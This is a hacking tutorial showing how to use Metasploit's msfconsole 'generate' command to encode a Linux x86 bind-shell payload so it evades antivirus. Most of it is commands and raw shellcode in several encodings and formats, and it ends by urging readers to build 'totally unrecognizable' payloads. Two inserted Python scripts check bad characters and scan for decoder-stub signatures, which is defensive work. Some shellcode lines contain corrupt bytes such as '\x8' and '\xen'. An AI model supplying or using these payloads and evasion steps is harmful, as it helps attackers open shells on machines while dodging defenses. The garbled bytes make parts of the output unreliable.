
How to Use MSFconsole's Generate Command to Obfuscate Payloads & Evade Antivirus Detection « Null Byte :: WonderHowTo



One of the things that distinguishes an experienced hacker from the script kiddies is the ability to sneak past antivirus defenses effectively while performing an attack. One way to do this is to use custom shellcode in an exploit. Not everyone is an expert at writing shellcode, but luckily there is an easy way to do it both quickly and effectively.

Antivirus evasion is a vast field that some people devote their entire careers to. It's a big part of exploit development, and it's certainly useful to know how to avoid common defense mechanisms. One way to disguise payloads is to generate custom shellcode. This method can be used when an exploit is rebuilt from scratch or when an existing exploit is adapted to better hide from antivirus software.

In Metasploit, payload shellcode can be generated from within the framework. Today we will use msfconsole, probably the best-known interface for Metasploit. When a payload is loaded, a few additional commands become available, including the generate command, which this guide focuses on.

Generating a Payload

Let's first fire up Metasploit by entering msfconsole in the terminal. Once it has loaded, we can choose a payload. Most payloads will work, but for demonstration purposes we'll use a simple bind shell.

Type use payload/linux/x86/shell_bind_tcp to load and focus the payload, followed by help to display the available commands:

    msf > use payload/linux/x86/shell_bind_tcp
    msf payload(linux/x86/shell_bind_tcp) > help

    ...

    Payload Commands
    ================

        Command     Description
        -------     -----------
        check       Check to see if a target is vulnerable
        generate    Generates a payload
        reload      Reload the current module from disk
        to_handler  Creates a handler with the specified payload

The command we are interested in is generate, so enter generate -h to display the options available:

    msf payload(linux/x86/shell_bind_tcp) > generate -h
    Usage: generate [options]

    Generates a payload.

    OPTIONS:

        -E        Force encoding.
        -b <opt>  The list of characters to avoid: '\x00\xff'
        -e <opt>  The name of the encoder module to use.
        -f <opt>  The output file name (otherwise stdout)
        -h        Help banner.
        -i <opt>  the number of encoding iterations.
        -k        Keep the template executable functional
        -o <opt>  A comma separated list of options in VAR=VAL format.
        -p <opt>  The Platform for output.
        -s <opt>  NOP sled length.
        -t <opt>  The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
        -x <opt>  The executable template to use

Option 1: Standard Generation

We can generate shellcode with no options at all, although the likelihood that such a payload bypasses modern antivirus software is fairly low. Below we see the size of the generated payload, 78 bytes, followed by some other settings and finally the raw shellcode.

    msf payload(linux/x86/shell_bind_tcp) > generate
    # linux/x86/shell_bind_tcp - 78 bytes
    # http://www.metasploit.com
    # VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +
    "\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89" +
    "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" +
    "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" +
    "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" +
    "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

Option 2: Use Different Encoders

By default, Metasploit selects the best encoder for the job, but we can also specify which one to use to meet custom requirements. Enter show encoders to see a list of the available encoders and their descriptions.

    msf payload(linux/x86/shell_bind_tcp) > show encoders

    Encoders
    ========

       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       cmd/brace                                low        Bash Brace Expansion Command Encoder
       cmd/echo                                 good       Echo Command Encoder
       cmd/generic_sh                           manual     Generic Shell Variable Substitution Command Encoder
       cmd/ifs                                  low        Bourne ${IFS} Substitution Command Encoder
       cmd/perl                                 normal     Perl Command Encoder
       cmd/powershell_base64                    excellent  Powershell Base64 Command Encoder
       cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
       generic/eicar                            manual     The EICAR Encoder
       generic/none                             normal     The "none" Encoder
       mipsbe/byte_xori                         normal     Byte XORi Encoder
       mipsbe/longxor                           normal     XOR Encoder
       mipsle/byte_xori                         normal     Byte XORi Encoder
       mipsle/longxor                           normal     XOR Encoder
       php/base64                               great      PHP Base64 Encoder
       ppc/longxor                              normal     PPC LongXOR Encoder
       ppc/longxor_tag                          normal     PPC LongXOR Encoder
       ruby/base64                              great      Ruby Base64 Encoder

    ...

For example, we could use a simple XOR countdown encoder (x86/countdown). Specify the encoder with the -e flag. The generated shellcode now looks different, and it is slightly larger at 94 bytes.

    msf payload(linux/x86/shell_bind_tcp) > generate -e x86/countdown
    # linux/x86/shell_bind_tcp - 94 bytes
    # http://www.metasploit.com
    # Encoder: x86/countdown
    # VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\x6a\x4d\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07" +
    "\xe2\xfa\x30\xd9\xf4\xe7\x56\x45\x54\x62\x0b\x83\xea\xbc" +
    "\x6b\xc3\x8f\x4b\x4f\x40\x7b\x16\x15\x07\x4b\x72\x09\x4b" +
    "\x4b\x95\xfc\x74\x79\x78\xec\xa2\xaa\x65\x21\x95\x23\x98" +
    "\x4f\xe7\xab\x6f\x9d\x48\xe2\xb0\xa2\x6b\x59\x0b\x6d\xfb" +
    "\xb7\x71\x40\xc2\x53\x13\x12\x4d\x57\x28\x6e\x20\x2a\x2a" +
    "\xcc\xa5\x17\x1b\xc0\xab\xfb\x47\x80\xce"

Option 3: Remove Bad Characters

Depending on the target, certain characters must not appear in the payload. The null byte (\x00) almost always causes problems when present in a payload, with only rare exceptions. When generating shellcode, use the -b flag to specify the characters to avoid.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00'
    # linux/x86/shell_bind_tcp - 105 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\xbb\xed\x04\xc7\xf5\xdd\xc7\xd9\x74\x24\xf4\x5a\x29\xc9" +
    "\xb1\x14\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\x0f\xf1\xf6" +
    "\x2e\x38\x19\xab\x93\x95\xb4\x4e\x9d\xf8\xf9\x29\x50\x7a" +
    "\xa2\xeb\x38\x12\x57\x14\xac\xbe\x3d\x04\x9f\x6e\x4b\xc5" +
    "\x75\xe8\x13\xcb\x0a\x7d\xe2\xd7\xb9\x79\x55\xb1\x70\x01" +
    "\xd6\x8e\xed\xcc\x59\x7d\xa8\xa4\x66\xda\x86\xb8\xd0\xa3" +
    "\xe0\xd0\xcd\x7c\x62\x48\x7a\xac\xe6\xe1\x14\x3b\x05\xa1" +
    "\xbb\xb2\x2b\xf1\x37\x08\x2b"

We can exclude several characters at once.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00\xa1\x66\x81'
    # linux/x86/shell_bind_tcp - 105 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x14\xb8\xb8\x2e" +
    "\x24\x7f\x83\xc5\x04\x31\x45\x15\x03\x45\x15\x5a\xdb\x15" +
    "\xa4\x6d\xc7\x05\x19\xc2\x62\xa8\x14\x05\xc2\xca\xeb\x45" +
    "\x78\x4d\xa6\x2d\x7d\x71\x57\xf1\xeb\x61\x06\x59\x65\x60" +
    "\xc2\x3f\x2d\xae\x93\x36\x8c\x34\x27\x4c\xbf\x53\x8a\xcc" +
    "\xfc\x2b\x72\x01\x82\xdf\x22\xf3\xbc\x87\x19\x83\x8a\x4e" +
    "\x5a\xeb\x23\x9e\xe9\x83\x53\xcf\x6f\x3a\xca\x86\x93\xec" +
    "\x41\x10\xb2\xbc\x6d\xef\xb5"

However, this feature has its limits. If too many characters are disallowed, the payload may fail to generate, giving the following error.

    [-] Payload generation failed: No encoders encoded the buffer successfully.
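Before trusting a -b run, it is worth checking the result rather than the header. The script below is an added example, not code from the article or from Metasploit: it parses the text that generate prints in its default Ruby-style format, confirms that the declared byte count matches the decoded bytes, and reports every forbidden byte value with the offsets where it occurs. The two sample inputs are the unencoded 78-byte output and the -b '\x00' output shown above, copied from this page; the function names are my own.

```python
import re

# Constructed sample inputs: the two generate outputs shown above (unencoded, 78 bytes,
# and the -b '\x00' run, 105 bytes), copied from the page in generate's Ruby output format.
RAW_OUTPUT = r'''
# linux/x86/shell_bind_tcp - 78 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependSetresgid=false,
# PrependSetregid=false, PrependSetgid=false,
# PrependChrootBreak=false, AppendExit=false
buf =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +
"\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89" +
"\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" +
"\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" +
"\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" +
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
'''

ENCODED_OUTPUT = r'''
# linux/x86/shell_bind_tcp - 105 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
# PrependChrootBreak=false, AppendExit=false
buf =
"\xbb\xed\x04\xc7\xf5\xdd\xc7\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\x0f\xf1\xf6" +
"\x2e\x38\x19\xab\x93\x95\xb4\x4e\x9d\xf8\xf9\x29\x50\x7a" +
"\xa2\xeb\x38\x12\x57\x14\xac\xbe\x3d\x04\x9f\x6e\x4b\xc5" +
"\x75\xe8\x13\xcb\x0a\x7d\xe2\xd7\xb9\x79\x55\xb1\x70\x01" +
"\xd6\x8e\xed\xcc\x59\x7d\xa8\xa4\x66\xda\x86\xb8\xd0\xa3" +
"\xe0\xd0\xcd\x7c\x62\x48\x7a\xac\xe6\xe1\x14\x3b\x05\xa1" +
"\xbb\xb2\x2b\xf1\x37\x08\x2b"
'''

HEADER_RE = re.compile(r"^#\s*(\S+)\s*-\s*(\d+)\s*bytes\s*$")
ENCODER_RE = re.compile(r"^#\s*Encoder:\s*(\S+)")
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_generate_output(text):
    """Parse the text msfconsole's generate command prints in its Ruby output format."""
    info = {"payload": None, "declared_size": None, "encoder": None, "options": {}, "bytes": b""}
    blob = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('"'):
            # String-literal lines carry the shellcode as \xNN escapes; decode each one.
            blob.extend(int(h, 16) for h in ESCAPE_RE.findall(line))
            continue
        m = HEADER_RE.match(line)
        if m:
            info["payload"], info["declared_size"] = m.group(1), int(m.group(2))
            continue
        m = ENCODER_RE.match(line)
        if m:
            info["encoder"] = m.group(1)
            continue
        if line.startswith("#") and "=" in line:
            # Datastore summary lines look like "KEY=VAL, KEY=VAL," (RHOST= has an empty value).
            for pair in line.lstrip("#").split(","):
                if "=" in pair:
                    key, val = pair.split("=", 1)
                    info["options"][key.strip()] = val.strip()
    info["bytes"] = bytes(blob)
    return info


def find_bad_chars(blob, badchars):
    """Map each forbidden byte value that occurs in blob to the offsets where it occurs."""
    hits = {}
    for off, b in enumerate(blob):
        if b in badchars:
            hits.setdefault(b, []).append(off)
    return hits


def audit(text, badchars):
    """Check one generate output: declared size vs. decoded size, and bad-char violations."""
    info = parse_generate_output(text)
    return {
        "encoder": info["encoder"],
        "size_ok": info["declared_size"] == len(info["bytes"]),
        "violations": find_bad_chars(info["bytes"], badchars),
    }


if __name__ == "__main__":
    for name, text in (("unencoded", RAW_OUTPUT), ("-b '\\x00'", ENCODED_OUTPUT)):
        print(name, audit(text, b"\x00\xa1\x66\x81"))
```

Run against the unencoded output, the audit flags the null at offset 20 (the 0x00 inside the port 4444 bytes, \x11\x5c). The -b '\x00' output is clean for the null byte, but auditing it against the longer list '\x00\xa1\x66\x81' reports \x66 at offset 78 and \xa1 at offset 97, which is why that list needs its own generate run.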


Option 4: Multiple Iterations

Another useful technique for bypassing antivirus is multi-pass payload encoding. This takes the generated shellcode and runs it back through the encoder for as many passes as specified. Use the -i flag to set the number of encoding iterations.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00\xa1\x66\x81' -i 5
    # linux/x86/shell_bind_tcp - 213 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\xd9\xc6\xd9\x74\x24\xf4\x5f\xbd\x8\x20\x24\xe6\x33\xc9" +
    "\xb1\x2f\x31\x6f\x19\x83\xc7\x04\x03\x6f\x15\x6f\xd5\x9e" +
    "\x6e\x55\xa6\x85\xb5\x7e\x1f\x4d\x6e\x74\xff\x9f\xa7\xc5" +
    "\x28\xd1\x60\x30\x2a\x46\x9a\xb9\xeb\x6c\x46\xc0\x12\x1b" +
    "\x05\x33\xe7\x68\x65\x0c\xc3\x1e\xc6\xdb\xd9\x59\x5d\x6c" +
    "\x89\xd0\xc9\x26\xd4\x5d\x1d\xea\xe0\xbc\x1b\x7f\xee\x8d" +
    "\x5f\xaf\xd0\xb4\x9e\xec\x3f\x38\x83\x03\x9f\x44\xe4\x83" +
    "\x3f\xc9\x4f\x41\x2c\x4b\x94\x98\x5d\x4e\x27\x1f\x15\x76" +
    "\xb6\x12\xf5\xfd\xf4\x35\x9f\xfd\xa3\xd1\x93\xa3\x39\x6e" +
    "\x9c\xbe\xd6\xbc\xb0\x5a\x6b\x03\x52\x56\x7b\x54\x1b\xb6" +
    "\x3c\x4e\xc8\x1e\x30\xa5\x1f\xe3\x2e\x90\x78\x22\x7d\x67" +
    "\x08\x04\x91\x77\x7e\xde\xce\x4e\xa8\x5c\xa3\x77\x63\xe3" +
    "\x67\x41\x2d\x9c\x29\x0b\x57\x02\x23\x50\x1b\x8a\x82\xbe" +
    "\x0e\x5e\x8a\x96\x5e\x1d\x65\xbe\x3b\x51\x80\xa5\x0f\x8f" +
    "\x30\xdf\x12\xd0\x80\xa6\x4c\x1a\xf0\xc2\x17\xdd\xa3\x7d" +
    "\x2d\xc1\x0c"

Option 5: Combining Options

Remember, when we generate shellcode we can combine several options to improve our chances of getting around antivirus detection. If we look closely, the default listening port for our bind shell is set to 4444. We can change this, and any other option, with the -o flag followed by the variable name and the new value. Let's set the listening port to 1234.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234
    # linux/x86/shell_bind_tcp - 213 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=1234, RHOST=, PrependFork=false,
    # PrependSetresuid=false, PrependSetreuid=false,
    # PrependSetuid=false, PrependSetresgid=false,
    # PrependSetregid=false, PrependSetgid=false,
    # PrependChrootBreak=false, AppendExit=false
    buf =
    "\xb8\xee\x58\x02\xcc\xda\xcc\xd9\x74\x24\xf4\x5a\x2b\xc9" +
    "\xb1\x2f\x83\xea\xfc\x31\x42\x10\x03\x42\x10\x0c\xad\xd8" +
    "\x01\x6a\x27\x02\xd8\xa0\x61\xc8\xff\x40\xcf\x18\xc9\x19" +
    "\xd8\x6b\x9f\x43\x9a\x4a\x1b\x70\xca\x44\xc6\xea\x96\xe7" +
    "\x07\x35\x8e\x31\x9f\x37\x99\x0f\x70\xaa\xba\x48\xd9\x1b" +
    "\x88\xdd\xc2\x4f\x1a\xc7\xac\xb6\xe7\xd4\x86\xdd\x24\x1b" +
    "\xa0\x60\x51\x78\x01\x37\x50\x84\x39\xe3\xe1\x95\x18\x65" +
    "\xfb\x97\x75\xc2\x7f\x82\xcd\x93\xf1\x4e\x49\xff\x99\xen" +
    "\x85\x10\xf9\xad\x4c\xec\x37\xb4\x04\x1c\xb0\xc6\xcf\x55" +
    "\x6a\xa9\x68\xc6\x84\xad\xba\xfa\x59\x3a\x02\xbf\x32\x55" +
    "\x9d\x9f\x76\x80\x54\xd9\xcc\x03\x8c\x65\x2b\x8f\xdc\x4c" +
    "\xd9\x6f\x6f\x6e\x0e\x8a\x8a\xa8\x14\xb9\x2d\x70\x78\xed" +
    "\xa2\x24\xac\xf1\x15\xd0\x90\xeb\x38\x56\x52\x6b\xf3\xeb" +
    "\x77\x21\xeb\x3d\x64\xf9\xc3\x65\xe3\xab\x5c\xd5\xaa\x3d" +
    "\x07\xa0\x95\x3f\xd3\x9b\xc9\x48\x52\x0b\x15\x42\xa8\x2d" +
    "\x54\x01\x4f"

Option 6: Output Formats

Another very useful feature is the ability to output the payload in various formats. The list of available formats is displayed when you call the help with generate -h. For example, to generate shellcode in Java format, we use the -t flag. The output looks a little different than before, as the shellcode is now in a different format.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234 -t java
    /*
     * linux/x86/shell_bind_tcp - 213 bytes
     * http://www.metasploit.com
     * Encoder: x86/shikata_ga_nai
     * VERBOSE=false, LPORT=1234, RHOST=, PrependFork=false,
     * PrependSetresuid=false, PrependSetreuid=false,
     * PrependSetuid=false, PrependSetresgid=false,
     * PrependSetregid=false, PrependSetgid=false,
     * PrependChrootBreak=false, AppendExit=false
     */
    byte buf[] = new byte[]
    {
        (byte) 0xbd, (byte) 0x47, (byte) 0xcc, (byte) 0x2b, (byte) 0x9a, (byte) 0xd9, (byte) 0xc7, (byte) 0xd9,
        (byte) 0x74, (byte) 0x24, (byte) 0xf4, (byte) 0x5a, (byte) 0x33, (byte) 0xc9, (byte) 0xb1, (byte) 0x2f,
        (byte) 0x31, (byte) 0x6a, (byte) 0x14, (byte) 0x83, (byte) 0xea, (byte) 0xfc, (byte) 0x03, (byte) 0x6a,
        (byte) 0x10, (byte) 0xa5, (byte) 0x39, (byte) 0xf0, (byte) 0x4c, (byte) 0x93, (byte) 0x94, (byte) 0x72,
        (byte) 0x6d, (byte) 0x33, (byte) 0xc1, (byte) 0x09, (byte) 0xa9, (byte) 0x47, (byte) 0xaa, (byte) 0xd8,
        (byte) 0x78, (byte) 0x16, (byte) 0x63, (byte) 0x98, (byte) 0xbb, (byte) 0x5c, (byte) 0x45, (byte) 0xce,
        (byte) 0x2d, (byte) 0x5f, (byte) 0xf5, (byte) 0xf8, (byte) 0xb3, (byte) 0xfc, (byte) 0x59, (byte) 0xd8,
        (byte) 0x5c, (byte) 0x95, (byte) 0x72, (byte) 0x82, (byte) 0x0f, (byte) 0x67, (byte) 0xe9, (byte) 0xfa,
        (byte) 0x60, (byte) 0xcd, (byte) 0x43, (byte) 0x0c, (byte) 0xa8, (byte) 0x89, (byte) 0xe7, (byte) 0xc5,
        (byte) 0xf7, (byte) 0x96, (byte) 0x64, (byte) 0x15, (byte) 0x65, (byte) 0x09, (byte) 0x99, (byte) 0x25,
        (byte) 0xe0, (byte) 0x91, (byte) 0xd2, (byte) 0x61, (byte) 0xc3, (byte) 0x9e, (byte) 0xed, (byte) 0xed,
        (byte) 0x87, (byte) 0xd4, (byte) 0x83, (byte) 0xbb, (byte) 0x5d, (byte) 0x46, (byte) 0xaa, (byte) 0x4d,
        (byte) 0x1a, (byte) 0xd9, (byte) 0x1a, (byte) 0x3c, (byte) 0xf9, (byte) 0xa5, (byte) 0x44, (byte) 0xb6,
        (byte) 0x47, (byte) 0xe2, (byte) 0x82, (byte) 0x58, (byte) 0xe4, (byte) 0xf7, (byte) 0x30, (byte) 0x9b,
        (byte) 0x6a, (byte) 0x0b, (byte) 0xa7, (byte) 0xf9, (byte) 0xb5, (byte) 0x23, (byte) 0x99, (byte) 0x54,
        (byte) 0xc6, (byte) 0x0f, (byte) 0x4a, (byte) 0x63, (byte) 0x08, (byte) 0xe3, (byte) 0xeb, (byte) 0xc4,
        (byte) 0x39, (byte) 0xa2, (byte) 0xe7, (byte) 0x1f, (byte) 0x87, (byte) 0x0e, (byte) 0xc9, (byte) 0x94,
        (byte) 0xc2, (byte) 0x1d, (byte) 0x39, (byte) 0xba, (byte) 0xd4, (byte) 0x98, (byte) 0x53, (byte) 0x5b,
        (byte) 0xfa, (byte) 0x42, (byte) 0x27, (byte) 0x10, (byte) 0xf1, (byte) 0x82, (byte) 0xd3, (byte) 0x7c,
        (byte) 0x67, (byte) 0x13, (byte) 0x90, (byte) 0xbc, (byte) 0xaf, (byte) 0xb6, (byte) 0xcb, (byte) 0x6b,
        (byte) 0x50, (byte) 0x62, (byte) 0xee, (byte) 0xaa, (byte) 0x80, (byte) 0x6e, (byte) 0x75, (byte) 0x5e,
        (byte) 0x9b, (byte) 0xcc, (byte) 0xf6, (byte) 0x3f, (byte) 0xde, (byte) 0xd9, (byte) 0xa2, (byte) 0xf2,
        (byte) 0x8b, (byte) 0x9d, (byte) 0x1a, (byte) 0x4b, (byte) 0x9f, (byte) 0xdc, (byte) 0x96, (byte) 0x69,
        (byte) 0x74, (byte) 0xfc, (byte) 0x4f, (byte) 0x18, (byte) 0x72, (byte) 0x35, (byte) 0x88, (byte) 0x71,
        (byte) 0x46, (byte) 0x31, (byte) 0x5d, (byte) 0x9b, (byte) 0x44, (byte) 0x34, (byte) 0x46, (byte) 0xec,
        (byte) 0x1e, (byte) 0xdd, (byte) 0x8e, (byte) 0xf9, (byte) 0xb3, (byte) 0xe0, (byte) 0x51, (byte) 0x4e,
        (byte) 0xb8, (byte) 0xee, (byte) 0x7b, (byte) 0x29, (byte) 0x1e
    };

Option 7: Save as File

Finally, we have the ability to save the generated payload to a file instead of displaying it on the screen. Use the -f flag followed by the file path; in this case, a file named payload will be saved directly in the home directory.

    msf payload(linux/x86/shell_bind_tcp) > generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234 -t java -f payload
    [*] Writing 3183 bytes to payload...

Will Antivirus Really Be Bypassed by This?

VirusTotal is an online tool that scans suspicious files to see whether they are malicious. It combines many antivirus products and tests uploaded files against the known signatures in its database. We can see that the sample payload we created comes back clean for most antivirus products.

Be aware that uploading a file to VirusTotal adds it to the database, so do not upload anything you do not want discovered in the future. Feel free to play around with all the options the generate command has to offer and have fun creating a totally unrecognizable payload.
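One caveat the VirusTotal result hides: an encoder randomizes the payload body, but every encoded buffer still starts with a small decoder stub that unpacks the rest at runtime, and that stub is what static signatures latch onto. The script below is an added example, not code from the article or from Metasploit. It scans the first 16 bytes of each output shown on this page for two such stubs: the fnstenv [esp-0xc] GetPC sequence (d9 74 24 f4) that begins every x86/shikata_ga_nai decoder, and the call -1 / inc ecx GetPC sequence (e8 ff ff ff ff c1) used by x86/countdown. The sample bytes are copied from the outputs above; the signature names are my own, and the patterns are plain instruction encodings, not any vendor's actual rule.

```python
# Constructed sample inputs: the first 16 bytes of each generate output shown on this page.
# The rest of each buffer is omitted; the decoder stub sits at the front of an encoded payload.
SAMPLES = {
    "unencoded":       bytes.fromhex("31dbf7e35343536a0289e1b066cd805b"),  # generate, no options
    "countdown":       bytes.fromhex("6a4d59e8ffffffffc15e304c0e07e2fa"),  # -e x86/countdown
    "shikata_b_null":  bytes.fromhex("bbed04c7f5ddc7d97424f45a29c9b114"),  # -b '\x00'
    "shikata_b_four":  bytes.fromhex("d9cfd97424f45d33c9b114b8b82e247f"),  # -b '\x00\xa1\x66\x81'
    "shikata_i5":      bytes.fromhex("b8ee5802ccdaccd97424f45a2bc9b12f"),  # -i 5 -o lport=1234
    "shikata_java":    bytes.fromhex("bd47cc2b9ad9c7d97424f45a33c9b12f"),  # same run, -t java
}

# Static patterns of the kind antivirus engines and YARA rules match. Each is the
# encoding of a GetPC instruction sequence, not a value taken from a vendor signature set.
SIGNATURES = {
    # fnstenv [esp-0xc]: leaks EIP via the saved FPU environment; shikata_ga_nai's opener
    "x86 fnstenv GetPC stub": b"\xd9\x74\x24\xf4",
    # call $-1 lands on its own last 0xff byte, which together with 0xc1 decodes as inc ecx;
    # the following pop then recovers the return address. Used by x86/countdown.
    "x86 call -1 GetPC stub": b"\xe8\xff\xff\xff\xff\xc1",
}


def scan(blob):
    """Return [(signature_name, offset), ...] for every signature occurrence in blob."""
    hits = []
    for name, pattern in SIGNATURES.items():
        start = 0
        while (off := blob.find(pattern, start)) != -1:
            hits.append((name, off))
            start = off + 1
    return hits


def classify(samples):
    """Map each sample name to the sorted signature names it triggers (empty = no static hit)."""
    return {name: sorted({sig for sig, _ in scan(blob)}) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:15s} {blob.hex()}  {scan(blob) or 'no static hit'}")
```

Run as-is, the unencoded buffer produces no hit (a plain bind shell has no decoder), the countdown buffer matches the call -1 pattern at offset 3, and all four shikata_ga_nai outputs match the fnstenv pattern at offset 2 or 7 regardless of the bad-character list, the iteration count or the output format: five passes still leave one outermost decoder in front. Changing the encoder changes the body, not the fact that a stub is there, which is why encoding alone is a weak defense against signature scanning and why defenders can key on these sequences.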

Final Thoughts

Metasploit makes it easy to create custom shellcode from within msfconsole, obfuscating payloads and helping them evade antivirus detection. The generate command has many options, from excluding certain characters to encoding the payload over multiple iterations. Most of these options can be combined to create a payload that has a good chance of bypassing antivirus software, a goal any would-be hacker should keep in mind.

Cover image by insspirito/Pixabay; screenshots by drd_/Null Byte
